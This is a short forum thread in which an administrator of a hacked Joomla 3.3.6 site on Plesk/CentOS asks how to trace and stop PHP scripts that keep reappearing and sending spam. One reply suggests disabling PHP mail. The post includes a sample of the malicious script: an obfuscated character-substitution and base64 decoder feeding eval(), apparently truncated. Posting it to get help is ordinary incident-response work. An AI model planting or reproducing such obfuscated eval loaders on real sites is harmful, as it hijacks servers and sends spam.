[Spam php script] Finding the root cause

[minhnv]

Hi all,

My server sending a lot of spam emails via some php script like below and in the attachment.
I can found the file and delete it. After few hours, some other script appear (even after i changed all the password, not sure if spammer upload all the script before or not) and sending spam again.

Some info:
+Joomla 3.3.6 website
+Plesk 11.5
+CentOS 6.5

Action i did:
+ Delete php scipts
+ Change all password related to this subscription: Users,fpt,...
+ Turn off mail service, turn off mail feature in joomla.

What i looking for:
+ Root cause? Please instruct me to find this ( access log ? ip ? ) or somethings else ?
+ How to prevent such problem ?

<?php
function dbwcmxhx($ijljihs, $axdxkatqwt){$jvmpgqagt = ''; for($i=0; $i < strlen($ijljihs); $i++){$jvmpgqagt .= isset($axdxkatqwt[$ijljihs[$i]]) ? $axdxkatqwt[$ijljihs[$i]] : $ijljihs[$i];}
$uh="base64_decode";return $uh($jvmpgqagt);}
$qfzaigliex = 'zh1qC29g7czMGX2SJ89ScXaU7SJNHY02fYA3FA3eCP03cui1Bmwp6h9pcX2SJ89SJS'.
'JNHle3FA3eCP03cui1Bmwp6PEscX2s7PiWBh1U619yCPW1GSAwkmVOmVng7cjtBh1o729NCPW3BmwATfNTm818Th1gJX2yTmj'.
$djvgzn = Array('1'=>'l', '0'=>'5', '3'=>'p', '2'=>'V', '5'=>'Y', '4'=>'8', '7'=>'Z', '6'=>'b', '9'=>'9', '8'=>'m', 'A'=>'w', 'C'=>'a', 'B'=>'d', 'E'=>'F', 'D'=>'i', 'G'=>'J', 'F'=>'O', 'I'=>'h', 'H'=>'I', 'K'=>'L', 'J'=>'c', 'M'=>'o', 'L'=>'U', 'O'=>'7', 'N'=>'s', 'Q'=>'j', 'P'=>'W', 'S'=>'y', 'R'=>'P', 'U'=>'v', 'T'=>'K', 'W'=>'1', 'V'=>'k', 'Y'=>'E', 'X'=>'2', 'Z'=>'r', 'a'=>'x', 'c'=>'X', 'b'=>'6', 'e'=>'A', 'd'=>'S', 'g'=>'z', 'f'=>'T', 'i'=>'N', 'h'=>'G', 'k'=>'M', 'j'=>'R', 'm'=>'C', 'l'=>'D', 'o'=>'t', 'n'=>'B', 'q'=>'u', 'p'=>'n', 's'=>'4', 'r'=>'q', 'u'=>'3', 't'=>'f', 'w'=>'g', 'v'=>'e', 'y'=>'0', 'x'=>'H', 'z'=>'Q');
eval(dbwcmxhx($qfzaigliex, $djvgzn));?>

 

[abdi]

Hi,

Start by disabling the classical PHP Mail function!!

 

[minhnv]

already did